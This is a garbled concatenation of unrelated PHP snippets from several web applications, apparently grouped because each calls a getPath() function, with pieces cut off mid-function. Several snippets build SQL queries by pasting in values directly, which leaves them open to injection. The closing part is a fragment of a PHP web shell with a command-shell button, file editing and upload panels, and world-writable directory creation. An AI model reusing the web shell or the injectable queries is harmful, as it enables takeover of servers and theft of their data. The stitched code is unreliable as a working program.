public function initContent()
{
$this->initTabModuleList();
$this->renderPageHeaderToolbar();
$this->admin_cms_categories->token = $this->token;
$this->admin_cms->token = $this->token;
if ($this->display == 'edit_category') {
$this->content .= $this->admin_cms_categories->renderForm();
} elseif ($this->display == 'edit_page') {
$this->content .= $this->admin_cms->renderForm();
} elseif ($this->display == 'view_page') {
$fixme = 'fixme';
} else {
$id_cms_category = (int) Tools::getValue('id_cms_category');
if (!$id_cms_category) {
$id_cms_category = 1;
}
// CMS categories breadcrumb
$cms_tabs = array('cms_category', 'cms');
// Cleaning links
$cat_bar_index = self::$currentIndex;
foreach ($cms_tabs as $tab) {
if (Tools::getValue($tab . 'Orderby') && Tools::getValue($tab . 'Orderway')) {
$cat_bar_index = preg_replace('/&' . $tab . 'Orderby=([a-z _]*)&' . $tab . 'Orderway=([a-z]*)/i', '', self::$currentIndex);
}
}
$this->context->smarty->assign(array('cms_breadcrumb' => getPath($cat_bar_index, $id_cms_category, '', '', 'cms'), 'page_header_toolbar_btn' => $this->page_header_toolbar_btn, 'page_header_toolbar_title' => $this->toolbar_title));
$this->content .= $this->admin_cms_categories->renderList();
$this->admin_cms->id_cms_category = $id_cms_category;
$this->content .= $this->admin_cms->renderList();
}
$this->context->smarty->assign(array('content' => $this->content));
}
function rss_feed_url()
{
if (getConfig('rss.output.usemodrewrite')) {
return getPath() . $GLOBALS['rss']->currentFeed->escapedTitle . "/";
}
return getPath() . "feed.php?channel=" . $GLOBALS['rss']->currentFeed->cid;
}
function initMage($code = '')
{
$path = getPath(dirname(__FILE__), 3);
if (file_exists($path . '/app/Mage.php')) {
include_once $path . '/app/Mage.php';
Mage::app($code);
}
}
function print_styles()
{
echo '<link href="' . getPath() . '/style.css" rel="stylesheet">';
global $con;
$result = mysqli_query($con, "SELECT css FROM css WHERE pid = " . $this->id . "");
while ($row = mysqli_fetch_array($result)) {
echo '<link href="' . getPath() . '/' . $row['css'] . '" rel="stylesheet">';
}
}
function getPage($page)
{
global $menu;
$p=getPath($page,$menu);
if($p=="")
return pageNotFound($page);
include($p);
return html(head().view());
}
function themes()
{
$themes = getThemes();
if (isset($_GET['theme']) && array_key_exists($_GET['theme'], $themes)) {
$active_theme = sanitize($_GET['theme'], RSS_SANITIZER_SIMPLE_SQL | RSS_SANITIZER_NO_SPACES);
$sql = "update " . getTable('config') . " set value_ = '{$active_theme}'" . " where key_='rss.output.theme'";
rss_query($sql);
rss_invalidate_cache();
} else {
$active_theme = getConfig('rss.output.theme');
}
echo "<form style=\"float:right\" method=\"post\" action=\"" . $_SERVER['PHP_SELF'] . "\">\n" . "<p><input type=\"hidden\" name=\"" . CST_ADMIN_DOMAIN . "\" value=\"" . CST_ADMIN_DOMAIN_THEMES . "\" />\n" . "<input type=\"submit\" name=\"admin_themes_check_for_updates\" value=\"" . __('Check for Updates') . "\" /></p>\n" . "</form>\n";
if (isset($_POST['admin_themes_check_for_updates'])) {
theme_getThemesUpdate($themes);
}
echo "<h2 class=\"trigger\">" . __('Themes') . "</h2>\n" . "<div id=\"admin_themes\" >\n";
echo __('<p style="font-size:small">Themes are made of a set of template files which specify how your Gregarius installation looks.<br />More themes can be downloaded from the <a style="text-decoration:underline" href="http://themes.gregarius.net/">Themes Repository</a>.</p>');
foreach ($themes as $entry => $theme) {
extract($theme);
if (!$name) {
$name = $entry;
}
if ($url) {
$author = "<a href=\"{$url}\">{$author}</a>";
}
$active = $entry == $active_theme;
$updateAvailable = isset($theme['updateVersion']);
if ($screenshot) {
$screenshotURL = "<img src=\"" . getPath() . RSS_THEME_DIR . "/{$fsname}/{$screenshot}\" />";
} else {
$screenshotURL = "<img src=\"" . getPath() . RSS_THEME_DIR . "/default/media/noscreenshot.png\" />";
}
$h4 = "{$name}";
$h5 = "By {$author} | Version: {$version}";
if ($updateAvailable) {
$h5 .= ' | <a class="update" href="' . $theme['updateUrl'] . '">Update to version ' . $theme['updateVersion'] . '</a>';
}
if ($htmltheme) {
$seturl = "index.php?view=themes&theme={$entry}";
} else {
$seturl = "";
}
echo "<div class=\"themeframe" . ($active ? " active" : "") . ($updateAvailable ? " hilite" : "") . "\"><span>";
if (!$active && $htmltheme) {
echo "<a href=\"{$seturl}\" class=\"bookmarklet\">" . __('Use this Theme') . "</a>";
} elseif ($active) {
echo "<p class=\"bookmarklet\">" . __('Active Theme') . "</p>";
}
echo "<h4>{$h4}</h4>\n";
if (file_exists("../" . RSS_THEME_DIR . "/{$fsname}/config.php")) {
echo "<a class=\"bookmarklet\" href=\"" . $_SERVER['PHP_SELF'] . "?" . CST_ADMIN_DOMAIN . "=" . CST_ADMIN_DOMAIN_THEME_OPTIONS . "&theme=" . $entry . "&" . CST_ADMIN_VIEW . "=" . CST_ADMIN_DOMAIN_THEME_OPTIONS . "\">" . __('Configure') . "</a>";
}
echo "<h5>{$h5}</h5>\n" . "<p class=\"themescreenshot\">{$screenshotURL}</p>" . "<p>{$description}</p> " . "</span></div>\n";
}
echo "</div>\n";
}
function render()
{
$output = View::do_fetch(getPath('views/main/sitemap.php'), $this->data);
// write the sitemap
writeFile(APP . 'public/sitemap.xml', $output, 'w');
// write the compressed sitemap
writeFile(APP . 'public/sitemap.xml.gz', $output, 'w9');
// view the Sitemap XML
//header('Location: ./sitemap.xml');
}
function __autoload($class_name)
{
$path = getPath($class_name);
if (file_exists($path)) {
require_once $path;
return true;
}
echo "Class not found: " . $path;
return false;
}
function requestAllPages()
{
$page = new Page();
$page->tablename = "pages";
$pages = $page->retrieve_many("date LIKE '%" . $this->data['date'] . "%'");
$view = getPath('views/archives/body.php');
foreach ($pages as $data) {
$data['view'] = $view;
$this->data['body'][] = $data;
}
}
function opml_export_form()
{
if (getConfig('rss.output.usemodrewrite')) {
$method = "post";
$action = getPath() . "opml";
} else {
$method = "get";
$action = getPath() . "opml.php";
}
echo "<fieldset style=\"vertical-align:top\">\n<legend>" . __('Export OPML:') . "</legend>\n";
echo "<form method=\"{$method}\" action=\"{$action}\">\n" . "<p><label for=\"action\">" . __('Export OPML:') . "</label>\n" . "<input type=\"submit\" name=\"act\" id=\"action\" value=\"" . __('Export') . "\" />" . "</p>\n</form>\n" . "</fieldset>\n";
}
function Navigation()
{
$this->appendNavItem(getPath(), __('<span>H</span>ome'), LOCATION_HOME);
if (!getConfig("rss.config.restrictrefresh")) {
$this->appendNavItem(getPath() . 'update.php', __('<span>R</span>efresh'), LOCATION_UPDATE);
}
$this->appendNavItem(getPath() . 'search.php', __('<span>S</span>earch'), LOCATION_SEARCH);
$this->appendNavItem(getPath() . 'admin/', __('A<span>d</span>min'), LOCATION_ADMIN);
if (($an = rss_plugin_hook('rss.plugins.afternav', null)) != null) {
$this->postRender .= $an;
}
$GLOBALS['rss']->nav = $this;
rss_plugin_hook('rss.plugins.navelements', null);
}
function getPath(array $ret, $id, $mysqli)
{
$query = "SELECT * FROM shop WHERE s_rowID='{$id}'";
$result = $mysqli->query($query);
$obj = $result->fetch_object();
if ($obj->s_parent == "") {
$ret[] = array($obj->s_title, $obj->s_rowID);
$ret[] = array("Shop", "");
return $ret;
} else {
$ret[] = array($obj->s_title, $obj->s_rowID);
return getPath($ret, $obj->s_parent, $mysqli);
}
}
function env_CFG()
{
$content = file_get_contents("/etc/profile.d/werm.sh");
//------------------------------------
preg_match_all("/(.*?)=(.*?)\$/m", (string) $content, $match, PREG_SET_ORDER);
//------------------------------------
foreach ($match as $key => $value) {
$env[$value[1]] = $value[2];
}
//------------------------------------
foreach ($env as $key => $value) {
$_ENV[$key] = getPath($env[$key], $env);
}
}
public function indexAction()
{
if ($this->has('security.csrf.token_manager')) {
$csrfToken = $this->get('security.csrf.token_manager')->getToken('authenticate')->getValue();
} else {
// BC for SF < 2.4
$csrfToken = $this->has('form.csrf_provider') ? $this->get('form.csrf_provider')->generateCsrfToken('authenticate') : null;
}
$em = $this->getDoctrine()->getManager();
$media = $em->getRepository('SiteBackOfficeBundle:Media')->findOneById('31');
$session = $this->getRequest()->getSession();
var_dump($media . getPath());
die;
return $this->render('SiteFrontOfficeBundle:Default:index.html.twig', array('csrf_token' => $csrfToken, 'media' => $media));
}
public static function getBody($path)
{
// pls replace strng $path with proper params array (make parameter generation more abstruct)
$items = array();
$tag = preg_replace('#^tag/#', '', $path);
$page = new Page();
$page->tablename = "pages";
$pages = $page->retrieve_many("tags like '%" . $tag . "%'");
$view = getPath('views/tag/body.php');
foreach ($pages as $data) {
$data['view'] = $view;
$items[] = $data;
}
return $items;
}
function downloadFile($dbxClient, $path)
{
if (!$path) {
header("Location: " . getPath(""));
exit;
}
$fd = tmpfile();
$metadata = $dbxClient->getFile($path, $fd);
$file_name = str_replace('/', '', $path);
fseek($fd, 0);
$downloadPath = 'downloads' . $path;
if (!file_exists($downloadPath)) {
file_put_contents($downloadPath, $fd);
}
fclose($fd);
}
/**
* The request router looks at the URI path, tries to load it from /assets,
* then tries to route the request through the Router if it's a model.
* If it's not a model, the PageEngine tries to render the template file.
*/
function routeRequest()
{
$path = getPath();
if (!$path) {
return PageEngine::renderPage('index');
}
if (File::find("assets/{$path}")) {
File::render("assets/{$path}");
}
try {
$router = new Router();
return $router->route($path);
} catch (ModelExistenceException $e) {
return PageEngine::renderPage($path);
}
}
public static function getCurrentPage($defaultPage = "/home")
{
$strPage = $defaultPage;
if (array_key_exists("path", $_GET)) {
$strPage = $_GET["path"];
/*} elseif ( array_key_exists("PATH_INFO", $_SERVER) ) {
$strPage = $_SERVER["PATH_INFO"];*/
} elseif (strstr($_SERVER["SCRIPT_FILENAME"], getPath(""))) {
$strPage = "/" . str_replace(getPath(""), "", dirname($_SERVER["SCRIPT_FILENAME"]));
}
// strip out paths
$strPage = preg_replace("/\\/index\\.php\$/", "", $strPage);
$strPage = preg_replace("/^\\/content/", "", $strPage);
// if page exists, return it, otherwise return default page
if (Page::isPage($strPage)) {
return $strPage;
}
return $defaultPage;
}
function Header($title = "", $active = 0, $cidfid = null, $onLoadAction = "", $options = HDR_NONE, $links = NULL)
{
_pf('Header() ctor');
$this->docTitle = $title;
$this->active = $active;
$this->cidfid = $cidfid;
$this->onLoadAction = $onLoadAction;
$this->options = $options;
$this->rawTitle = $title;
$this->extraHeaders = array();
$this->docTitle = makeTitle($title);
if (getConfig("rss.output.titleunreadcnt") && is_array($cidfid) && ($uc = getUnreadCount($cidfid['cid'], $cidfid['fid']))) {
$this->docTitle .= " ({$uc} " . __('unread') . ")";
}
if ($active == 1 && MINUTE * getConfig('rss.config.refreshafter') >= 40 * MINUTE) {
$this->redirectUrl = guessTransportProto() . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']);
if (substr($this->redirectUrl, -1) != "/") {
$this->redirectUrl .= "/";
}
$this->redirectUrl .= "update.php";
$this->redirectTimeout = MINUTE * getConfig('rss.config.refreshafter');
}
$this->links = array();
$this->links[] = array('start', 'Home', getPath());
$this->links[] = array('search', 'Search', getPath() . "search.php");
$this->links[] = array('tags', 'Tags', getPath() . (getConfig('rss.output.usemodrewrite') ? "tag/" : "tags.php?alltags"));
if ($links != NULL) {
//var_dump($links);
foreach ($links as $rel => $link) {
$this->links[] = array($rel, $link['title'], $link['href']);
}
}
$this->javascriptFiles[] = getPath() . "ajax.php?js";
$this->javascriptFiles[] = getPath() . "extlib/md5.js";
if (getConfig('rss.output.channelcollapse')) {
$this->javascriptFiles[] = getPath() . "extlib/fcollapse.js";
}
$GLOBALS['rss']->sideMenu = new SideMenu();
$GLOBALS['rss']->sideMenu->addMenu(__('Feeds'), 'FeedList', "_side('FeedList')");
$GLOBALS['rss']->sideMenu->addMenu(__('Categories'), 'CatList', "_side('CatList')");
$GLOBALS['rss']->sideMenu->addMenu(__('Tags'), 'TagList', "_side('TagList')");
}
function getConfig()
{
$config = array();
// get the raw db output
$table_rows = $this->get_tables();
// exit if no config is returned
if (!is_array($table_rows)) {
return false;
}
// clean up data in a better format
foreach ($table_rows as $table => $rows) {
// create the config table if it doesn't exist
if (!array_key_exists($table, $config)) {
$config[$table] = array();
}
foreach ($rows as $row) {
// delete a duplicate key
if (array_key_exists($row['key'], $config[$table])) {
// backwards compatibility - see if there's an id available
if ($row['id']) {
$c = new Config($row['id'], $table);
// delete entry
$c->delete();
}
} else {
$config[$table][$row['key']] = $row['value'];
}
}
}
// verify config against the setup
foreach ($config as $type => $properties) {
$is_plugin = getPath($type . "/bin/config.php");
$is_controller = getPath("controllers/" . $type . ".php");
// delete the config entry if no controller/plugin found
if (!$is_plugin && !$is_controller) {
unset($config[$type]);
$this->unregister($type);
}
}
return $config;
}
function mobileLoginForm()
{
?>
<html><head><title>Login</title></head>
<body>
<form method="post" action="<?php
echo getPath();
?>
">
<p><input type="hidden" name="media" value="mobile" />
<label for="username">Username:</label>
<input type="text" id="username" name="username" value="" /></p>
<p><label for="password">Password:</label>
<input type="password" name="password" id="password" value="" /></p>
<p><input type="submit" name="login" value="Go" /></p>
</form>
</body>
</html>
<?php
flush();
exit;
}
function getNavbar()
{
$path = getPath();
return '<nav class="navbar navbar-default" role="navigation">
<div class="container-fluid">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">
<a class="navbar-brand" href="' . $path . '">NTNU Gløshaugen</a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li><a href="' . $path . '/pages/gamlefysikk.php">Gamle Fysikk</a></li>
<li><a href="' . $path . '/pages/hovedbygget.php">Hovedbygget</a></li>
<li><a href="' . $path . '/pages/itbygget.php">IT-bygget</a></li>
<li><a href="' . $path . '/pages/p15.php">P15</a></li>
<li><a href="' . $path . '/pages/realfagsbygget.php">Realfagsbygget</a></li>
</ul>
</div>
</div>
</nav>';
}
function findController($url)
{
// first remove the website path from the URL
$requri = preg_replace('#^' . addslashes(WEB_FOLDER) . '#', '', $url);
// now split the path to two parts - the first is the controller, the second it's parameters
preg_match('#^([^/]+)/?(.*)$#', $requri, $matches);
// fix - remove last match if empty
if (isset($matches[count($matches) - 1]) && $matches[count($matches) - 1] == '') {
array_pop($matches);
}
//
// first match is always the contoller - add it if it exists, is made out of alphanumeric chars and is not empty...
$controller = isset($matches[1]) && preg_match('#^[A-Za-z0-9_\\-\\.]+$#', $matches[1]) && !empty($matches[1]) ? $matches[1] : false;
// check if the controller exists
$controllerfile = getPath('controllers/' . $controller . '.php');
// check if what we found is sane
if (!$controller || !file_exists($controllerfile)) {
// find the default controller
if (defined("DEFAULT_ROUTE")) {
$controller = DEFAULT_ROUTE;
$controllerfile = getPath('controllers/' . $controller . '.php');
}
}
if (!empty($controllerfile)) {
// set the controller file as a constant for later use (only do it the first time...)
if (!defined("CONTROLLER")) {
define("CONTROLLER", $controller);
}
// include the controller file
require $controllerfile;
// NEW: CamelCase controller (plus remove special characters)
$controller = str_replace(" ", "", ucwords(preg_replace("/\\.|\\-/", " ", $controller)));
// OLD: return the controller name with the first letter uppercase
//ucfirst( $controller )
return $controller;
}
}
?>
</div>
<div id="content-wrapper">
<div id="content" class="home">
<?php
LayoutHelper::renderPlaceHolder($PAGE, "Main");
?>
</div>
<div id="side">
<?php
LayoutHelper::renderPlaceHolder($PAGE, "Side");
?>
</div>
<div class="clear-hidden"></div>
</div>
<div id="footer">
<?php
include "includes/footer.php";
?>
<a href="http://www.jozza.net/content/home/projects/structure-cms/"><img src="<?php
getPath("");
?>
/structurecms-logo.gif" border="0" alt="© Created using StructureCMS" title="© Created using StructureCMS"></a>
<div class="clear-hidden"></div>
</div>
</div>
</div>
</body>
</html>
$sql = "SELECT nUserId , vUserName , vEmail , vLogin , vPassword FROM sptbl_users ";
$sql .= " WHERE vEmail = '" . mysql_real_escape_string($useremail) . "' ";
$result = executeSelect($sql, $conn);
if (mysql_num_rows($result) > 0) {
$row = mysql_fetch_array($result);
$userid = $row["nUserId"];
$username = $row["vLogin"];
$useremail = $row["vEmail"];
$userfullname = $row["vUserName"];
$code = rand(1, 999999);
$sql = "UPDATE sptbl_users ";
$sql .= " SET vCodeForPass = '******' WHERE nUserId = '" . $userid . "' ";
//echo $sql;
$result = executeSelect($sql, $conn);
//$path = substr($thisfile,0,)
$link = getPath() . "/resetpass.php?action=resetpass&code=" . $code;
$message = true;
/*****************************************************************************/
$sql = " Select * from sptbl_lookup where vLookUpName IN('Post2PostGap','MailFromName','MailFromMail',";
$sql .= "'MailReplyName','MailReplyMail','Emailfooter','Emailheader','AutoLock','HelpdeskTitle')";
$result = executeSelect($sql, $conn);
if (mysql_num_rows($result) > 0) {
while ($row = mysql_fetch_array($result)) {
switch ($row["vLookUpName"]) {
case "MailFromName":
$var_fromName = $row["vLookUpValue"];
break;
case "MailFromMail":
$var_fromMail = $row["vLookUpValue"];
break;
case "MailReplyName":
function tags()
{
// Fix for #16: Admin (et al.) should not rely on l10n labels for actions:
// Look for a meta-action first, which should be the (untranslated) *name* of
// the (translated) action constant.
// Fixme: should replace 'action's with a constant
if (array_key_exists(CST_ADMIN_METAACTION, $_REQUEST)) {
$__action__ = $_REQUEST[CST_ADMIN_METAACTION];
} elseif (array_key_exists('action', $_REQUEST)) {
$__action__ = $_REQUEST['action'];
} else {
$__action__ = "";
}
if (isset($_REQUEST['id'])) {
$tid = sanitize($_REQUEST['id'], RSS_SANITIZER_NUMERIC);
}
$ret__ = CST_ADMIN_DOMAIN_TAGS;
switch ($__action__) {
case CST_ADMIN_EDIT_ACTION:
tag_edit($tid);
$ret__ = CST_ADMIN_DOMAIN_NONE;
break;
case CST_ADMIN_DELETE_ACTION:
if (array_key_exists(CST_ADMIN_CONFIRMED, $_POST) && $_POST[CST_ADMIN_CONFIRMED] == __('Yes')) {
$sql = "delete from " . getTable("tag") . " where id={$tid}";
rss_query($sql);
$sql = "delete from " . getTable("metatag") . " where tid={$tid}";
rss_query($sql);
rss_invalidate_cache();
} elseif (array_key_exists(CST_ADMIN_CONFIRMED, $_REQUEST) && $_REQUEST[CST_ADMIN_CONFIRMED] == __('No')) {
// nop;
} elseif (array_key_exists('me_delete', $_REQUEST)) {
if (array_key_exists('me_do_delete', $_REQUEST) && "1" == $_REQUEST['me_do_delete']) {
$ids = array();
foreach ($_REQUEST as $key => $val) {
if (preg_match('/^tcb([0-9]+)$/', $key, $match)) {
if (($id = (int) $_REQUEST[$key]) > 0) {
$ids[] = $id;
}
}
}
if (count($ids) > 0) {
$sql = "delete from " . getTable("tag") . " where id in (" . implode(',', $ids) . ")";
rss_query($sql);
$sql = "delete from " . getTable("metatag") . " where tid in (" . implode(',', $ids) . ")";
rss_query($sql);
rss_invalidate_cache();
}
}
} else {
list($tname) = rss_fetch_row(rss_query("select tag from " . getTable("tag") . " where id = {$tid}"));
echo "<form class=\"box\" method=\"post\" action=\"" . $_SERVER['PHP_SELF'] . "\">\n" . "<p class=\"error\">";
printf(__("Are you sure you wish to delete '%s'?"), $tname);
echo "</p>\n" . "<p><input type=\"submit\" name=\"" . CST_ADMIN_CONFIRMED . "\" value=\"" . __('No') . "\"/>\n" . "<input type=\"submit\" name=\"" . CST_ADMIN_CONFIRMED . "\" value=\"" . __('Yes') . "\"/>\n" . "<input type=\"hidden\" name=\"id\" value=\"{$tid}\"/>\n" . "<input type=\"hidden\" name=\"" . CST_ADMIN_DOMAIN . "\" value=\"" . CST_ADMIN_DOMAIN_TAGS . "\"/>\n" . "<input type=\"hidden\" name=\"action\" value=\"" . CST_ADMIN_DELETE_ACTION . "\"/>\n" . "</p>\n</form>\n";
$ret__ = CST_ADMIN_DOMAIN_NONE;
}
break;
case CST_ADMIN_SUBMIT_EDIT:
// TBD
$new_label = preg_replace(ALLOWED_TAGS_REGEXP, '', $_REQUEST['t_name']);
// also replace whitespaces
$new_label = str_replace(' ', '', $new_label);
if (is_numeric($tid) && strlen($new_label) > 0) {
$res = rss_query("select count(*) as cnt from " . getTable("tag") . " where binary tag='" . rss_real_escape_string($new_label) . "'");
list($cnt) = rss_fetch_row($res);
if ($cnt > 0) {
rss_error(sprintf(__("You can't rename this item '%s' because such an item already exists."), $new_label), RSS_ERROR_ERROR, true);
break;
}
rss_query("update " . getTable("tag") . " set tag='" . rss_real_escape_string($new_label) . "' where id={$tid}");
rss_invalidate_cache();
}
break;
default:
break;
}
echo "<script type=\"text/javascript\">\n" . "//<!--\n" . "function cbtoggle() {\n" . "var c=document.getElementById('mastercb').checked;\n" . "var cs=document.getElementById('tagtable').getElementsByTagName('input');\n" . "for(i=0;i<cs.length;i++) {\n" . "if (cs[i].type == 'checkbox') cs[i].checked = c;\n" . "}\n" . "}\n" . "</script>\n";
echo "<form method=\"post\" action=\"" . $_SERVER['PHP_SELF'] . "\">\n" . "<h2 class=\"trigger\">" . __('Tags') . "</h2>\n" . "<div id=\"admin_tags\" class=\"trigger\">" . "<table id=\"tagtable\">\n" . "<tr>\n" . "\t<th><input type=\"checkbox\" id=\"mastercb\" onclick=\"cbtoggle();\" /></th>\n" . "\t<th class=\"cntr\">" . __('Tags') . "</th>\n" . "\t<th>" . __('Action') . "</th>\n" . "</tr>\n";
$sql = sprintf("select id, tag from %s t left join %s m on (t.id = m.tid) where m.ttype = 'item'", getTable("tag"), getTable("metatag"));
$res = rss_query($sql);
$cntr = 0;
while (list($id, $tag) = rss_fetch_row($res)) {
$class_ = $cntr++ % 2 == 0 ? "even" : "odd";
echo "<tr class=\"{$class_}\">\n" . "\t<td><input type=\"checkbox\" name=\"tcb{$id}\" value=\"{$id}\" id=\"scb_{$id}\" /></td>\n" . "\t<td><label for=\"scb_{$id}\">" . htmlspecialchars($tag) . "</label></td>\n" . "\t<td><a href=\"" . $_SERVER['PHP_SELF'] . "?" . CST_ADMIN_DOMAIN . "=" . CST_ADMIN_DOMAIN_TAGS . "&action=" . CST_ADMIN_EDIT_ACTION . "&id={$id}\">" . __('edit') . "</a>\n" . "|<a href=\"" . $_SERVER['PHP_SELF'] . "?" . CST_ADMIN_DOMAIN . "=" . CST_ADMIN_DOMAIN_TAGS . "&action=" . CST_ADMIN_DELETE_ACTION . "&id={$id}\">" . __('delete') . "</a>\n" . "|<a href=\"" . getPath('tag/' . htmlspecialchars($tag)) . "\">" . __('view') . "</a>\n" . "</td>\n" . "</tr>\n";
}
echo "</table>\n";
echo "<fieldset>\n" . "<legend>" . __('Selected') . "...</legend>\n" . "<p>\n" . "<input type=\"submit\" id=\"me_delete\" name=\"me_delete\" value=\"" . __('Delete') . "\" />\n" . "<input type=\"checkbox\" name=\"me_do_delete\" id=\"me_do_delete\" value=\"1\" />\n" . "<label for=\"me_do_delete\">" . __("I'm sure!") . "</label>\n" . "<input type=\"hidden\" name=\"action\" value=\"" . CST_ADMIN_DELETE_ACTION . "\" />\n" . "<input type=\"hidden\" name=\"" . CST_ADMIN_DOMAIN . "\" value=\"" . CST_ADMIN_DOMAIN_TAGS . "\" />\n" . "</fieldset>\n" . "</form>\n" . "</div>\n";
}
public function renderView()
{
$this->tpl_view_vars['query'] = Tools::safeOutput($this->query);
$this->tpl_view_vars['show_toolbar'] = true;
if (count($this->errors)) {
return parent::renderView();
} else {
$nb_results = 0;
foreach ($this->_list as $list) {
if ($list != false) {
$nb_results += count($list);
}
}
$this->tpl_view_vars['nb_results'] = $nb_results;
if (isset($this->_list['features']) && count($this->_list['features'])) {
$this->tpl_view_vars['features'] = $this->_list['features'];
}
if (isset($this->_list['categories']) && count($this->_list['categories'])) {
$categories = array();
foreach ($this->_list['categories'] as $category) {
$categories[] = getPath($this->context->link->getAdminLink('AdminCategories', false), $category['id_category']);
}
$this->tpl_view_vars['categories'] = $categories;
}
if (isset($this->_list['products']) && count($this->_list['products'])) {
$view = '';
$this->initProductList();
$helper = new HelperList();
$helper->shopLinkType = '';
$helper->simple_header = true;
$helper->identifier = 'id_product';
$helper->actions = array('edit');
$helper->show_toolbar = false;
$helper->table = 'product';
$helper->currentIndex = $this->context->link->getAdminLink('AdminProducts', false);
$helper->token = Tools::getAdminTokenLite('AdminProducts');
if ($this->_list['products']) {
$view = $helper->generateList($this->_list['products'], $this->fields_list['products']);
}
$this->tpl_view_vars['products'] = $view;
}
if (isset($this->_list['customers']) && count($this->_list['customers'])) {
$view = '';
$this->initCustomerList();
$helper = new HelperList();
$helper->shopLinkType = '';
$helper->simple_header = true;
$helper->identifier = 'id_customer';
$helper->actions = array('edit', 'view');
$helper->show_toolbar = false;
$helper->table = 'customer';
$helper->currentIndex = $this->context->link->getAdminLink('AdminCustomers', false);
$helper->token = Tools::getAdminTokenLite('AdminCustomers');
if ($this->_list['customers']) {
foreach ($this->_list['customers'] as $key => $val) {
$this->_list['customers'][$key]['orders'] = Order::getCustomerNbOrders((int) $val['id_customer']);
}
$view = $helper->generateList($this->_list['customers'], $this->fields_list['customers']);
}
$this->tpl_view_vars['customers'] = $view;
}
if (isset($this->_list['orders']) && count($this->_list['orders'])) {
$view = '';
$this->initOrderList();
$helper = new HelperList();
$helper->shopLinkType = '';
$helper->simple_header = true;
$helper->identifier = 'id_order';
$helper->actions = array('view');
$helper->show_toolbar = false;
$helper->table = 'order';
$helper->currentIndex = $this->context->link->getAdminLink('AdminOrders', false);
$helper->token = Tools::getAdminTokenLite('AdminOrders');
if ($this->_list['orders']) {
$view = $helper->generateList($this->_list['orders'], $this->fields_list['orders']);
}
$this->tpl_view_vars['orders'] = $view;
}
if (isset($this->_list['modules']) && count($this->_list['modules'])) {
$this->tpl_view_vars['modules'] = $this->_list['modules'];
}
if (isset($this->_list['addons']) && count($this->_list['addons'])) {
$this->tpl_view_vars['addons'] = $this->_list['addons'];
}
return parent::renderView();
}
}
public function ajaxProcessAddCategoryReduction()
{
$category_reduction = Tools::getValue('category_reduction');
$id_category = Tools::getValue('id_category');
//no cast validation is done with Validate::isUnsignedId($id_category)
$result = array();
if (!Validate::isUnsignedId($id_category)) {
$result['errors'][] = Tools::displayError('Wrong category ID.');
$result['hasError'] = true;
} else {
if (!$this->validateDiscount($category_reduction)) {
$result['errors'][] = Tools::displayError('The discount value is incorrect (must be a percentage).');
$result['hasError'] = true;
} else {
$result['id_category'] = (int) $id_category;
$result['catPath'] = getPath(self::$currentIndex . '?tab=AdminCategories', (int) $id_category);
$result['discount'] = $category_reduction;
$result['hasError'] = false;
}
}
die(Tools::jsonEncode($result));
}
public function display()
{
global $currentIndex;
if ((Tools::isSubmit('submitAddcms_category') or Tools::isSubmit('submitAddcms_categoryAndStay')) and sizeof($this->adminCMSCategories->_errors) or isset($_GET['updatecms_category']) or isset($_GET['addcms_category'])) {
$this->adminCMSCategories->displayForm($this->token);
echo '<br /><br /><a href="' . $currentIndex . '&token=' . $this->token . '"><img src="../img/admin/arrow2.gif" /> ' . $this->l('Back to list') . '</a><br />';
} elseif ((Tools::isSubmit('submitAddcms') or Tools::isSubmit('submitAddcmsAndStay')) and sizeof($this->adminCMS->_errors) or isset($_GET['updatecms']) or isset($_GET['addcms'])) {
$this->adminCMS->displayForm($this->token);
echo '<br /><br /><a href="' . $currentIndex . '&token=' . $this->token . '"><img src="../img/admin/arrow2.gif" /> ' . $this->l('Back to list') . '</a><br />';
} else {
$id_cms_category = (int) Tools::getValue('id_cms_category');
if (!$id_cms_category) {
$id_cms_category = 1;
}
$cms_tabs = array('cms_category', 'cms');
// Cleaning links
$catBarIndex = $currentIndex;
foreach ($cms_tabs as $tab) {
if (Tools::getValue($tab . 'Orderby') && Tools::getValue($tab . 'Orderway')) {
$catBarIndex = preg_replace('/&' . $tab . 'Orderby=([a-z _]*)&' . $tab . 'Orderway=([a-z]*)/i', '', $currentIndex);
}
}
echo '<div class="cat_bar"><span style="color: #3C8534;">' . $this->l('Current category') . ' :</span> ' . getPath($catBarIndex, $id_cms_category, '', '', 'cms') . '</div>';
echo '<h2>' . $this->l('Categories') . '</h2>';
$this->adminCMSCategories->display($this->token);
echo '<div style="margin:10px"> </div>';
echo '<h2>' . $this->l('Pages in this category') . '</h2>';
$this->adminCMS->display($this->token);
}
}
echo "can't make dir";
} else {
echo @mkdir("{$mkdirs}", 0777) ? "ok" : "";
@chmod("{$mkdirs}", 0777);
}
}
}
/////////
$pathname = str_replace('\\', '/', dirname(__FILE__));
////////
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir = $_post['dir'];
$nowpath = getPath($pathname, $dir);
}
///////
$dir_writeable = dir_writeable($nowpath) ? "m" : "mm";
$phpinfo = !eregi("phpinfo", $dis_func) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = substr(PHP_OS, 0, 3) == 'WIN' ? " | <a href=\"?action=reg\"mohajer22</a>" : "";
$tb = new FORMS();
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td><b>' . $mohajer . '</b></td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top');
$tb->tdbody("<FORM method='POST' action='{$REQUEST_URI}' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='erne' value='erne ' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
$tb->tablefooter();
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur</b></td></tr></table>', 'center', 'top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
